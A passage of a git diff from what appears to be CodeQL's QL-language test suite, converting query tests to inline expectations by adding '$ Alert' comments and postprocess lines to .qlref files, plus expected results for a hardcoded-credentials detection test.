| test.py:5:12:5:24 | ControlFlowNode for StringLiteral | test.py:14:18:14:25 | ControlFlowNode for USERNAME | This hardcoded value is $@. | test.py:14:18:14:25 | ControlFlowNode for USERNAME | used as credentials | -| test.py:6:12:6:25 | ControlFlowNode for StringLiteral | test.py:6:12:6:25 | ControlFlowNode for StringLiteral | test.py:15:18:15:25 | ControlFlowNode for PASSWORD | This hardcoded value is $@. | test.py:15:18:15:25 | ControlFlowNode for PASSWORD | used as credentials | edges | test.py:5:1:5:8 | ControlFlowNode for USERNAME | test.py:14:18:14:25 | ControlFlowNode for USERNAME | provenance | | | test.py:5:12:5:24 | ControlFlowNode for StringLiteral | test.py:5:1:5:8 | ControlFlowNode for USERNAME | provenance | | @@ -14,3 +11,6 @@ nodes | test.py:14:18:14:25 | ControlFlowNode for USERNAME | semmle.label | ControlFlowNode for USERNAME | | test.py:15:18:15:25 | ControlFlowNode for PASSWORD | semmle.label | ControlFlowNode for PASSWORD | subpaths +#select +| test.py:5:12:5:24 | ControlFlowNode for StringLiteral | test.py:5:12:5:24 | ControlFlowNode for StringLiteral | test.py:14:18:14:25 | ControlFlowNode for USERNAME | This hardcoded value is $@. | test.py:14:18:14:25 | ControlFlowNode for USERNAME | used as credentials | +| test.py:6:12:6:25 | ControlFlowNode for StringLiteral | test.py:6:12:6:25 | ControlFlowNode for StringLiteral | test.py:15:18:15:25 | ControlFlowNode for PASSWORD | This hardcoded value is $@. | test.py:15:18:15:25 | ControlFlowNode for PASSWORD | used as credentials | diff --git a/ql/ql/test/queries/bugs/OrderByConst/Foo.qll b/ql/ql/test/queries/bugs/OrderByConst/Foo.qll index 7229564660ee..9f51572689c1 100644 --- a/ql/ql/test/queries/bugs/OrderByConst/Foo.qll +++ b/ql/ql/test/queries/bugs/OrderByConst/Foo.qll @@ -1,5 +1,5 @@ string foo() { - result = concat(string x | x = [0 .. 10].toString() | x order by x desc, ", ") // BAD + result = concat(string x | x = [0 .. 10].toString() | x order by x desc, ", ") // $ Alert // BAD or result = concat(string x | x = [0 .. 10].toString() | x, ", " order by x desc) // GOOD } diff --git a/ql/ql/test/queries/bugs/OrderByConst/OrderByConst.qlref b/ql/ql/test/queries/bugs/OrderByConst/OrderByConst.qlref index 809589a856f7..9c2263fc14df 100644 --- a/ql/ql/test/queries/bugs/OrderByConst/OrderByConst.qlref +++ b/ql/ql/test/queries/bugs/OrderByConst/OrderByConst.qlref @@ -1 +1,2 @@ -queries/bugs/OrderByConst.ql \ No newline at end of file +query: queries/bugs/OrderByConst.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/bugs/SumWithoutDomain/SumWithoutDomain.qlref b/ql/ql/test/queries/bugs/SumWithoutDomain/SumWithoutDomain.qlref index dc782dfbd0ab..46f2785806e9 100644 --- a/ql/ql/test/queries/bugs/SumWithoutDomain/SumWithoutDomain.qlref +++ b/ql/ql/test/queries/bugs/SumWithoutDomain/SumWithoutDomain.qlref @@ -1 +1,2 @@ -queries/bugs/SumWithoutDomain.ql \ No newline at end of file +query: queries/bugs/SumWithoutDomain.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/bugs/SumWithoutDomain/Test.qll b/ql/ql/test/queries/bugs/SumWithoutDomain/Test.qll index 8190aed81012..9b15c38d9c6e 100644 --- a/ql/ql/test/queries/bugs/SumWithoutDomain/Test.qll +++ b/ql/ql/test/queries/bugs/SumWithoutDomain/Test.qll @@ -1,6 +1,6 @@ // Result is 3 and not 4 int foo() { - result = sum([1, 1, 2]) // <- Alert here + result = sum([1, 1, 2]) // $ Alert // <- Alert here } // Ok - false negative diff --git a/ql/ql/test/queries/overlay/InlineOverlayCaller/InlineOverlayCaller.qlref b/ql/ql/test/queries/overlay/InlineOverlayCaller/InlineOverlayCaller.qlref index 0347e9eedc54..b3385b469714 100644 --- a/ql/ql/test/queries/overlay/InlineOverlayCaller/InlineOverlayCaller.qlref +++ b/ql/ql/test/queries/overlay/InlineOverlayCaller/InlineOverlayCaller.qlref @@ -1 +1,2 @@ -queries/overlay/InlineOverlayCaller.ql +query: queries/overlay/InlineOverlayCaller.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/overlay/InlineOverlayCaller/Test.qll b/ql/ql/test/queries/overlay/InlineOverlayCaller/Test.qll index e25577d91a17..a3e2f19447a3 100644 --- a/ql/ql/test/queries/overlay/InlineOverlayCaller/Test.qll +++ b/ql/ql/test/queries/overlay/InlineOverlayCaller/Test.qll @@ -4,7 +4,7 @@ module; import ql pragma[inline] -predicate foo(int x) { x = 42 } +predicate foo(int x) { x = 42 } // $ Alert overlay[caller] pragma[inline] diff --git a/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImport.qlref b/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImport.qlref index 4d7907c36ef3..4dc5cc5d490b 100644 --- a/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImport.qlref +++ b/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImport.qlref @@ -1 +1,2 @@ -queries/performance/AbstractClassImport.ql \ No newline at end of file +query: queries/performance/AbstractClassImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImportTest1.qll b/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImportTest1.qll index ce7f7c4ea688..fe2519cc0d56 100644 --- a/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImportTest1.qll +++ b/ql/ql/test/queries/performance/AbstractClassImport/AbstractClassImportTest1.qll @@ -1,4 +1,4 @@ import ql import AbstractClassImportTest2 -abstract class Base extends AstNode { } +abstract class Base extends AstNode { } // $ Alert diff --git a/ql/ql/test/queries/performance/MissingNoInline/MissingNoInline.qlref b/ql/ql/test/queries/performance/MissingNoInline/MissingNoInline.qlref index aee3346d730d..f1bc931e122b 100644 --- a/ql/ql/test/queries/performance/MissingNoInline/MissingNoInline.qlref +++ b/ql/ql/test/queries/performance/MissingNoInline/MissingNoInline.qlref @@ -1 +1,2 @@ -queries/performance/MissingNoinline.ql \ No newline at end of file +query: queries/performance/MissingNoinline.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/performance/MissingNoInline/Test.qll b/ql/ql/test/queries/performance/MissingNoInline/Test.qll index a55315be7e20..a92f7f38d0cc 100644 --- a/ql/ql/test/queries/performance/MissingNoInline/Test.qll +++ b/ql/ql/test/queries/performance/MissingNoInline/Test.qll @@ -5,7 +5,7 @@ import ql * * This predicate exists to fix a join order. */ -predicate missingNoInline(AddExpr add, Expr e1, Expr e2) { +predicate missingNoInline(AddExpr add, Expr e1, Expr e2) { // $ Alert // BAD add.getLeftOperand() = e1 and add.getRightOperand() = e2 diff --git a/ql/ql/test/queries/performance/VarUnusedInDisjunct/Test.qll b/ql/ql/test/queries/performance/VarUnusedInDisjunct/Test.qll index 10e97e582096..b4b30f100286 100644 --- a/ql/ql/test/queries/performance/VarUnusedInDisjunct/Test.qll +++ b/ql/ql/test/queries/performance/VarUnusedInDisjunct/Test.qll @@ -13,21 +13,21 @@ class MyStr extends string { predicate bad1(Big b) { b.toString().matches("%foo") or - any() + any() // $ Alert } int bad2() { exists(Big big, Small small | result = big.toString().toInt() or - result = small.toString().toInt() + result = small.toString().toInt() // $ Alert ) } float bad3(Big t) { result = [1 .. 10].toString().toFloat() or result = [11 .. 20].toString().toFloat() or - result = t.toString().toFloat() or + result = t.toString().toFloat() or // $ Alert result = [21 .. 30].toString().toFloat() } @@ -50,7 +50,7 @@ predicate bad4(Big fromType, Big toType) { or fromType.toString().matches("%foo") or - helper(toType, fromType) + helper(toType, fromType) // $ Alert } predicate good2(Big t) { @@ -71,7 +71,7 @@ predicate mixed1(Big good, Small small) { small.toString().matches("%foo") and // the use of good is fine, the comparison further up binds it. // the same is not true for bad. - (bad.toString().matches("%foo") or good.toString().regexpMatch("foo.*")) and + (bad.toString().matches("%foo") or good.toString().regexpMatch("foo.*")) and // $ Alert small.toString().regexpMatch(".*foo") ) } @@ -112,7 +112,7 @@ predicate good5(Big bb, Big v, boolean certain) { ) } -predicate bad5(Big bb) { if none() then bb.toString().matches("%foo") else any() } +predicate bad5(Big bb) { if none() then bb.toString().matches("%foo") else any() } // $ Alert pragma[inline] predicate good5(Big a, Big b) { @@ -126,12 +126,12 @@ predicate bad6(Big a) { ( a.toString().matches("%foo") // bad or - any() + any() // $ Alert ) and ( a.toString().matches("%foo") // also bad or - any() + any() // $ Alert ) } @@ -163,7 +163,7 @@ class HasField extends Big { HasField() { field = this or - this.toString().matches("%foo") // <- field only defined here. + this.toString().matches("%foo") // $ Alert // <- field only defined here. } Big getField() { result = field } diff --git a/ql/ql/test/queries/performance/VarUnusedInDisjunct/VarUnusedInDisjunct.qlref b/ql/ql/test/queries/performance/VarUnusedInDisjunct/VarUnusedInDisjunct.qlref index 28f0c0d938a1..0413e31942f1 100644 --- a/ql/ql/test/queries/performance/VarUnusedInDisjunct/VarUnusedInDisjunct.qlref +++ b/ql/ql/test/queries/performance/VarUnusedInDisjunct/VarUnusedInDisjunct.qlref @@ -1 +1,2 @@ -queries/performance/VarUnusedInDisjunct.ql \ No newline at end of file +query: queries/performance/VarUnusedInDisjunct.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/AcronymsShouldBeCamelCase.qlref b/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/AcronymsShouldBeCamelCase.qlref index 0f57f1fa66c7..3e287c27a394 100644 --- a/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/AcronymsShouldBeCamelCase.qlref +++ b/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/AcronymsShouldBeCamelCase.qlref @@ -1 +1,2 @@ -queries/style/AcronymsShouldBeCamelCase.ql \ No newline at end of file +query: queries/style/AcronymsShouldBeCamelCase.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/Test.qll b/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/Test.qll index 1ff0d4c0d52f..06742e069485 100644 --- a/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/Test.qll +++ b/ql/ql/test/queries/style/AcronymsShouldBeCamelCase/Test.qll @@ -1,13 +1,13 @@ // BAD -predicate isXML() { any() } +predicate isXML() { any() } // $ Alert // GOOD [ AES is exceptional ] predicate isAES() { any() } // BAD -newtype TXMLElements = +newtype TXMLElements = // $ Alert TXmlElement() or // GOOD - TXMLElement() // BAD + TXMLElement() // $ Alert // BAD // GOOD newtype TIRFunction = MkIRFunction() diff --git a/ql/ql/test/queries/style/CouldBeCast/CouldBeCast.qlref b/ql/ql/test/queries/style/CouldBeCast/CouldBeCast.qlref index 78879bb0ab03..36a6244669b8 100644 --- a/ql/ql/test/queries/style/CouldBeCast/CouldBeCast.qlref +++ b/ql/ql/test/queries/style/CouldBeCast/CouldBeCast.qlref @@ -1 +1,2 @@ -queries/style/CouldBeCast.ql \ No newline at end of file +query: queries/style/CouldBeCast.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/CouldBeCast/Foo.qll b/ql/ql/test/queries/style/CouldBeCast/Foo.qll index 5f6771f00437..6c3da185fe6f 100644 --- a/ql/ql/test/queries/style/CouldBeCast/Foo.qll +++ b/ql/ql/test/queries/style/CouldBeCast/Foo.qll @@ -1,20 +1,20 @@ bindingset[i] predicate foo(int i) { - exists(Even j | j = i) // NOT OK + exists(Even j | j = i) // $ Alert // NOT OK or exists(Even j | j = i | j % 4 = 0) // OK or - any(Even j | j = i) = 2 // NOT OK + any(Even j | j = i) = 2 // $ Alert // NOT OK or - any(Even j | j = i | j) = 2 // NOT OK + any(Even j | j = i | j) = 2 // $ Alert // NOT OK or any(Even j | j = i | j * 2) = 4 // OK or any(Even j | j = i and j % 4 = 0 | j) = 4 // OK or - any(int j | j = i) = 2 // NOT OK + any(int j | j = i) = 2 // $ Alert // NOT OK or - exists(int j | j = i) // NOT OK + exists(int j | j = i) // $ Alert // NOT OK } class Even extends int { diff --git a/ql/ql/test/queries/style/DataFlowConfigModuleNaming/DataFlowConfigModuleNaming.qlref b/ql/ql/test/queries/style/DataFlowConfigModuleNaming/DataFlowConfigModuleNaming.qlref index 62375818f5ea..2025f1cdb902 100644 --- a/ql/ql/test/queries/style/DataFlowConfigModuleNaming/DataFlowConfigModuleNaming.qlref +++ b/ql/ql/test/queries/style/DataFlowConfigModuleNaming/DataFlowConfigModuleNaming.qlref @@ -1 +1,2 @@ -queries/style/DataFlowConfigModuleNaming.ql \ No newline at end of file +query: queries/style/DataFlowConfigModuleNaming.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/DataFlowConfigModuleNaming/Test.qll b/ql/ql/test/queries/style/DataFlowConfigModuleNaming/Test.qll index a06118a7fe0a..6da96a4b572d 100644 --- a/ql/ql/test/queries/style/DataFlowConfigModuleNaming/Test.qll +++ b/ql/ql/test/queries/style/DataFlowConfigModuleNaming/Test.qll @@ -8,14 +8,14 @@ module EmptyConfig implements DataFlow::ConfigSig { } // BAD - does not end with "Config" -module EmptyConfiguration implements DataFlow::ConfigSig { +module EmptyConfiguration implements DataFlow::ConfigSig { // $ Alert predicate isSource(DataFlow::Node src) { none() } predicate isSink(DataFlow::Node sink) { none() } } // BAD - does not end with "Config" -module EmptyFlow implements DataFlow::ConfigSig { +module EmptyFlow implements DataFlow::ConfigSig { // $ Alert predicate isSource(DataFlow::Node src) { none() } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/ql/test/queries/style/DeadCode/DeadCode.qlref b/ql/ql/test/queries/style/DeadCode/DeadCode.qlref index ac615af49617..704cc5c1365e 100644 --- a/ql/ql/test/queries/style/DeadCode/DeadCode.qlref +++ b/ql/ql/test/queries/style/DeadCode/DeadCode.qlref @@ -1 +1,2 @@ -queries/style/DeadCode.ql \ No newline at end of file +query: queries/style/DeadCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/DeadCode/Foo.qll b/ql/ql/test/queries/style/DeadCode/Foo.qll index a5b5b08e2a4a..32fab335b780 100644 --- a/ql/ql/test/queries/style/DeadCode/Foo.qll +++ b/ql/ql/test/queries/style/DeadCode/Foo.qll @@ -1,11 +1,11 @@ import ql private module Mixed { - private predicate dead1() { none() } + private predicate dead1() { none() } // $ Alert predicate alive1() { none() } - predicate dead2() { none() } + predicate dead2() { none() } // $ Alert } predicate usesAlive() { Mixed::alive1() } @@ -43,7 +43,7 @@ private module Input1 implements InputSig { predicate foo() { any() } } -private module Input2 implements InputSig { +private module Input2 implements InputSig { // $ Alert predicate foo() { any() } } @@ -53,7 +53,7 @@ private module Input3 implements InputSig { module M1 = ParameterizedModule; -private module M2 = ParameterizedModule; +private module M2 = ParameterizedModule; // $ Alert import ParameterizedModule @@ -65,7 +65,7 @@ private class CImpl1 extends AstNode { } final class CPublic1 = CImpl1; -private class CImpl2 extends AstNode { } +private class CImpl2 extends AstNode { } // $ Alert overlay[discard_entity] private predicate discard(@foo x) { any() } diff --git a/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qll b/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qll index edfc8b4576e9..4f1d5da7196b 100644 --- a/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qll +++ b/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qll @@ -1,5 +1,5 @@ class C1 extends int { - int field; // BAD + int field; // $ Alert // BAD C1() { this = field and diff --git a/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qlref b/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qlref index 0e77c6ae6fe2..cf83276fb00e 100644 --- a/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qlref +++ b/ql/ql/test/queries/style/FieldOnlyUsedInCharPred/FieldOnlyUsedInCharPred.qlref @@ -1 +1,2 @@ -queries/style/FieldOnlyUsedInCharPred.ql +query: queries/style/FieldOnlyUsedInCharPred.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/ImplicitThis/Bad.qll b/ql/ql/test/queries/style/ImplicitThis/Bad.qll index 97b51284acc5..c1834c8bb6b7 100644 --- a/ql/ql/test/queries/style/ImplicitThis/Bad.qll +++ b/ql/ql/test/queries/style/ImplicitThis/Bad.qll @@ -7,5 +7,5 @@ class Foo extends string { string getBarWithThis() { result = this.getBar() } - string getBarWithoutThis() { result = getBar() } + string getBarWithoutThis() { result = getBar() } // $ Alert } diff --git a/ql/ql/test/queries/style/ImplicitThis/Bad2.qll b/ql/ql/test/queries/style/ImplicitThis/Bad2.qll index 27d7485ca4f9..540c02f09216 100644 --- a/ql/ql/test/queries/style/ImplicitThis/Bad2.qll +++ b/ql/ql/test/queries/style/ImplicitThis/Bad2.qll @@ -5,5 +5,5 @@ class Foo extends string { string getBar() { result = "bar" } - string getBarWithoutThis() { result = getBar() } + string getBarWithoutThis() { result = getBar() } // $ Alert } diff --git a/ql/ql/test/queries/style/ImplicitThis/ImplicitThis.qlref b/ql/ql/test/queries/style/ImplicitThis/ImplicitThis.qlref index 0bdcd3b4b5b0..f751b15e8146 100644 --- a/ql/ql/test/queries/style/ImplicitThis/ImplicitThis.qlref +++ b/ql/ql/test/queries/style/ImplicitThis/ImplicitThis.qlref @@ -1 +1,2 @@ -queries/style/ImplicitThis.ql +query: queries/style/ImplicitThis.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/MissingParameterInQlDoc/Foo.qll b/ql/ql/test/queries/style/MissingParameterInQlDoc/Foo.qll index 13509dbe5218..ffd21d59a5c9 100644 --- a/ql/ql/test/queries/style/MissingParameterInQlDoc/Foo.qll +++ b/ql/ql/test/queries/style/MissingParameterInQlDoc/Foo.qll @@ -2,7 +2,7 @@ predicate test1(int param1, int param2, int param3) { none() } // OK /** `param1`, `par2` */ -predicate test2(int param1, int param2) { none() } // NOT OK - `par2` is not a parameter, and `param2` has no documentation +predicate test2(int param1, int param2) { none() } // $ Alert // NOT OK - `par2` is not a parameter, and `param2` has no documentation /** `param1`, `par2 + par3` */ predicate test3(int param1, int par2, int par3) { none() } // OK @@ -11,4 +11,4 @@ predicate test3(int param1, int par2, int par3) { none() } // OK predicate test4(int param1, int param2) { none() } // OK - the QLDoc mentions none of the parameters, that's OK /** the param1 parameter is mentioned in a non-code block, but the `par2` parameter is misspelled */ -predicate test5(int param1, int param2) { none() } // NOT OK - the `param1` parameter is "documented" in clear text, but `par2` is misspelled +predicate test5(int param1, int param2) { none() } // $ Alert // NOT OK - the `param1` parameter is "documented" in clear text, but `par2` is misspelled diff --git a/ql/ql/test/queries/style/MissingParameterInQlDoc/MissingParameterInQlDoc.qlref b/ql/ql/test/queries/style/MissingParameterInQlDoc/MissingParameterInQlDoc.qlref index 0539e4f5de2d..a7d2f3d0a1d9 100644 --- a/ql/ql/test/queries/style/MissingParameterInQlDoc/MissingParameterInQlDoc.qlref +++ b/ql/ql/test/queries/style/MissingParameterInQlDoc/MissingParameterInQlDoc.qlref @@ -1 +1,2 @@ -queries/style/MissingParameterInQlDoc.ql \ No newline at end of file +query: queries/style/MissingParameterInQlDoc.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/MissingQualityMetadata/MissingQualityMetadata.qlref b/ql/ql/test/queries/style/MissingQualityMetadata/MissingQualityMetadata.qlref index 6d7eb26bedeb..48abe277264b 100644 --- a/ql/ql/test/queries/style/MissingQualityMetadata/MissingQualityMetadata.qlref +++ b/ql/ql/test/queries/style/MissingQualityMetadata/MissingQualityMetadata.qlref @@ -1 +1,2 @@ -queries/style/MissingQualityMetadata.ql +query: queries/style/MissingQualityMetadata.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMaintainabilityWrongToplevel.ql b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMaintainabilityWrongToplevel.ql index 3dd18771f959..0b1290de98b2 100644 --- a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMaintainabilityWrongToplevel.ql +++ b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMaintainabilityWrongToplevel.ql @@ -8,7 +8,7 @@ * @tags quality * maintainability * error-handling - */ + */ // $ Alert import ql diff --git a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMultipleTopLevel.ql b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMultipleTopLevel.ql index a9a7b48b76c7..4624b6d1076e 100644 --- a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMultipleTopLevel.ql +++ b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityMultipleTopLevel.ql @@ -8,7 +8,7 @@ * @tags quality * maintainability * reliability - */ + */ // $ Alert import ql diff --git a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityNoToplevel.ql b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityNoToplevel.ql index ad2ab5c1fb57..8c8bda6294e5 100644 --- a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityNoToplevel.ql +++ b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityNoToplevel.ql @@ -7,7 +7,7 @@ * @id ql/quality-query-test * @tags quality * someothertag - */ + */ // $ Alert import ql diff --git a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityReliabilityWrongToplevel.ql b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityReliabilityWrongToplevel.ql index 53e84fb8a196..1a33baf6c516 100644 --- a/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityReliabilityWrongToplevel.ql +++ b/ql/ql/test/queries/style/MissingQualityMetadata/testcases/BadQualityReliabilityWrongToplevel.ql @@ -8,7 +8,7 @@ * @tags quality * reliability * readability - */ + */ // $ Alert import ql diff --git a/ql/ql/test/queries/style/MissingSecurityMetadata/MissingSecurityMetadata.qlref b/ql/ql/test/queries/style/MissingSecurityMetadata/MissingSecurityMetadata.qlref index c697bcee82eb..bd4295a68621 100644 --- a/ql/ql/test/queries/style/MissingSecurityMetadata/MissingSecurityMetadata.qlref +++ b/ql/ql/test/queries/style/MissingSecurityMetadata/MissingSecurityMetadata.qlref @@ -1 +1,2 @@ -queries/style/MissingSecurityMetadata.ql \ No newline at end of file +query: queries/style/MissingSecurityMetadata.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSecurity.ql b/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSecurity.ql index d05628798311..a403812021e5 100644 --- a/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSecurity.ql +++ b/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSecurity.ql @@ -7,7 +7,7 @@ * @precision very-high * @id ql/some-query * @tags quality - */ + */ // $ Alert import ql diff --git a/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSeverity.ql b/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSeverity.ql index f04fe81599ab..47a12a1858a3 100644 --- a/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSeverity.ql +++ b/ql/ql/test/queries/style/MissingSecurityMetadata/testcases/BadNoSeverity.ql @@ -7,7 +7,7 @@ * @id ql/some-query * @tags quality * security - */ + */ // $ Alert import ql diff --git a/ql/ql/test/queries/style/Misspelling/Misspelling.qlref b/ql/ql/test/queries/style/Misspelling/Misspelling.qlref index afbcaf951f3e..ed9785fee3a7 100644 --- a/ql/ql/test/queries/style/Misspelling/Misspelling.qlref +++ b/ql/ql/test/queries/style/Misspelling/Misspelling.qlref @@ -1 +1,2 @@ -queries/style/Misspelling.ql \ No newline at end of file +query: queries/style/Misspelling.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/Misspelling/Test.qll b/ql/ql/test/queries/style/Misspelling/Test.qll index b6619145f8d5..1da75babe072 100644 --- a/ql/ql/test/queries/style/Misspelling/Test.qll +++ b/ql/ql/test/queries/style/Misspelling/Test.qll @@ -1,13 +1,13 @@ /** * A string that's deliberately mispelled (and so is that last word). - */ -class PublicallyAccessible extends string { - int numOccurences; // should be 'occurrences' + */ // $ Alert +class PublicallyAccessible extends string { // $ Alert + int numOccurences; // $ Alert // should be 'occurrences' PublicallyAccessible() { this = "publically" and numOccurences = 123 } // should be argument - predicate hasAgrument() { none() } + predicate hasAgrument() { none() } // $ Alert int getNum() { result = numOccurences } } @@ -15,8 +15,8 @@ class PublicallyAccessible extends string { /** * A class whose name contains a British-English spelling. * And here's the word 'colour'. - */ -class AnalysedInt extends int { + */ // $ Alert +class AnalysedInt extends int { // $ Alert AnalysedInt() { this = 7 } // 'analyses' should not be flagged diff --git a/ql/ql/test/queries/style/NonDocBlock/Foo.qll b/ql/ql/test/queries/style/NonDocBlock/Foo.qll index 99f957fa7704..22fc0e3761a7 100644 --- a/ql/ql/test/queries/style/NonDocBlock/Foo.qll +++ b/ql/ql/test/queries/style/NonDocBlock/Foo.qll @@ -1,13 +1,13 @@ /* * This should be QLDoc. - */ + */ // $ Alert /** * this is fine */ predicate foo() { any() } -/* Note: this is bad. */ +/* Note: this is bad. */ // $ Alert class Foo extends string { Foo() { this = "FOo" } } diff --git a/ql/ql/test/queries/style/NonDocBlock/NonDocBlock.qlref b/ql/ql/test/queries/style/NonDocBlock/NonDocBlock.qlref index b6dbdf506047..57118bb0ff76 100644 --- a/ql/ql/test/queries/style/NonDocBlock/NonDocBlock.qlref +++ b/ql/ql/test/queries/style/NonDocBlock/NonDocBlock.qlref @@ -1 +1,2 @@ -queries/style/NonDocBlock.ql \ No newline at end of file +query: queries/style/NonDocBlock.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/OmittableExists/OmittableExists.qlref b/ql/ql/test/queries/style/OmittableExists/OmittableExists.qlref index af9ad5ec40b5..c606ef984252 100644 --- a/ql/ql/test/queries/style/OmittableExists/OmittableExists.qlref +++ b/ql/ql/test/queries/style/OmittableExists/OmittableExists.qlref @@ -1 +1,2 @@ -queries/style/OmittableExists.ql \ No newline at end of file +query: queries/style/OmittableExists.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/OmittableExists/Test.qll b/ql/ql/test/queries/style/OmittableExists/Test.qll index 517758a9dabe..0312c86ec6e4 100644 --- a/ql/ql/test/queries/style/OmittableExists/Test.qll +++ b/ql/ql/test/queries/style/OmittableExists/Test.qll @@ -17,7 +17,7 @@ class Location extends @location_default { } predicate test() { - exists(int i | aPredicate(i)) // BAD + exists(int i | aPredicate(i)) // $ Alert // BAD or exists(int i | aPredicate(i) or anotherPredicate(i)) // BAD [NOT DETECTED] or diff --git a/ql/ql/test/queries/style/QlRefInlineExpectations/Test3.qlref b/ql/ql/test/queries/style/QlRefInlineExpectations/Test3.qlref index 5582a96837a3..f840a91b59ee 100644 --- a/ql/ql/test/queries/style/QlRefInlineExpectations/Test3.qlref +++ b/ql/ql/test/queries/style/QlRefInlineExpectations/Test3.qlref @@ -1 +1,2 @@ -query: ProblemQuery.ql \ No newline at end of file +query: ProblemQuery.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/RedundantCast/Foo.qll b/ql/ql/test/queries/style/RedundantCast/Foo.qll index d993f654bc42..4410d344c9f7 100644 --- a/ql/ql/test/queries/style/RedundantCast/Foo.qll +++ b/ql/ql/test/queries/style/RedundantCast/Foo.qll @@ -2,10 +2,10 @@ class Foo extends string { Foo() { this = "Foo" } } -predicate test(Foo f) { f.(Foo).toString() = "X" } +predicate test(Foo f) { f.(Foo).toString() = "X" } // $ Alert -predicate test2(Foo a, Foo b) { a.(Foo) = b } +predicate test2(Foo a, Foo b) { a.(Foo) = b } // $ Alert predicate called(Foo a) { a.toString() = "X" } -predicate test3(string s) { called(s.(Foo)) } +predicate test3(string s) { called(s.(Foo)) } // $ Alert diff --git a/ql/ql/test/queries/style/RedundantCast/RedundantCast.qlref b/ql/ql/test/queries/style/RedundantCast/RedundantCast.qlref index 659062d3ae55..77bbbe67466e 100644 --- a/ql/ql/test/queries/style/RedundantCast/RedundantCast.qlref +++ b/ql/ql/test/queries/style/RedundantCast/RedundantCast.qlref @@ -1 +1,2 @@ -queries/style/RedundantCast.ql +query: queries/style/RedundantCast.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/RedundantImport/D.qll b/ql/ql/test/queries/style/RedundantImport/D.qll index 1badf0ebbc54..ba5df313cdbd 100644 --- a/ql/ql/test/queries/style/RedundantImport/D.qll +++ b/ql/ql/test/queries/style/RedundantImport/D.qll @@ -1,2 +1,2 @@ -import folder.A +import folder.A // $ Alert import folder.B diff --git a/ql/ql/test/queries/style/RedundantImport/RedundantImport.qlref b/ql/ql/test/queries/style/RedundantImport/RedundantImport.qlref index a2ff992e5cd8..acacf6163e54 100644 --- a/ql/ql/test/queries/style/RedundantImport/RedundantImport.qlref +++ b/ql/ql/test/queries/style/RedundantImport/RedundantImport.qlref @@ 